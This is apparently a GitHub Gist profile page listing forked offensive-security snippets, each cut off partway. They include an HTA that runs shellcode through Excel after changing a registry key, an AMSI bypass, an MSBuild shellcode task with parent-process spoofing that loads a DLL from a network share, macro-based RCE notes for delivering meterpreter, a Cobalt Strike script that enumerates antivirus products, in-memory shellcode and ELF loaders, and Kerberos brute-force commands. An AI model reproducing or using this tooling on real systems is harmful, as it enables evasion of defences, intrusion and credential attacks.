Skip to content

Instantly share code, notes, and snippets.

View v4nyl's full-sized avatar

v4nyl

18 followers · 288 following
View GitHub Profile
@v4nyl
v4nyl / CalcExcel.hta
Created June 9, 2020 12:41 — forked from nicholasmckinney/CalcExcel.hta
Shellcode Execution Via HTA
<html>
<head>
<script>
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
@v4nyl
v4nyl / veh_AmsiBypass.cpp
Created July 20, 2021 17:46 — forked from aaaddress1/veh_AmsiBypass.cpp
(VEH) AMSI Bypass without Memory Patch
// Exception-Based AMSI Bypass
// by aaaddress1@chroot.org
#include <amsi.h>
#include <iostream>
#include <Windows.h>
#pragma comment(lib, "amsi.lib")
#pragma comment(lib, "ole32.lib")
#pragma warning( disable : 4996 )
#define AMSIPROJECTNAME L"scanner"
@v4nyl
v4nyl / msbuild_inline_task_parent_process_spoof.txt
Created August 2, 2021 20:00 — forked from rvrsh3ll/msbuild_inline_task_parent_process_spoof.txt
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MyTarget">
<SimpleTask MyProperty="My voice is my passport."
MyCode='<base64 encoded x64 shellcode>'
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
</Target>
<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>
@v4nyl
v4nyl / Find-Assemblies.ps1
Created August 2, 2021 20:11 — forked from TheWover/Find-Assemblies.ps1
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
Param([parameter(Mandatory=$true,
HelpMessage="Directory to search for .NET Assemblies in.")]
$Directory,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to search recursively.")]
[switch]$Recurse = $false,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to include DLLs in the search.")]
[switch]$DLLs = $false,
[parameter(Mandatory=$false,
@v4nyl
v4nyl / Various-Macro-Based-RCEs.md
Created August 2, 2021 20:15 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
@v4nyl
v4nyl / conti.cna
Created August 9, 2021 18:45 — forked from MHaggis/conti.cna
#AntiVirus Query
#Author: @r3dQu1nn
#Queries the Registry for AV installed
#Thanks to @i_am_excite and @merrillmatt011 for the help
#Props to @zerosum0x0 for the wmic find!
#Long ass one-liner :)
$powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE)
@v4nyl
v4nyl / rwxHunter.cs
Created September 3, 2021 20:43 — forked from nicholasmckinney/rwxHunter.cs
Locate a RWX Region in memory in InstallUtil.exe - Copy Shellcode Into It and Execute. Avoid VirtuallAlloc Call
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@v4nyl
v4nyl / mem-loader.asm
Created September 15, 2021 18:48 — forked from zznop/mem-loader.asm
Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by https://x-c3ll.github.io/posts/fileless-memfd_create/)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;;; Copyright (C), zznop, brandonkmiller@protonmail.com
;;;
;;; This software may be modified and distributed under the terms
;;; of the MIT license. See the LICENSE file for details.
;;;
;;; DESCRIPTION
;;;
;;; This PoC shellcode is meant to be compiled as a blob and prepended to a ELF
@v4nyl
v4nyl / kerberos_attacks_cheatsheet.md
Created September 18, 2021 18:43 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@v4nyl
v4nyl / Remove-File-Eventually.ps1
Created October 17, 2021 19:29 — forked from marnix/Remove-File-Eventually.ps1
PowerShell command to delete a file, if possible immediately, and if it is in use at the next boot.
param(
[parameter(Mandatory=$true)]
[string] $path
)
# the code below has been used from
# https://blogs.technet.com/b/heyscriptingguy/archive/2013/10/19/weekend-scripter-use-powershell-and-pinvoke-to-remove-stubborn-files.aspx
# with inspiration from
# http://www.leeholmes.com/blog/2009/02/17/moving-and-deleting-really-locked-files-in-powershell/
# and error handling from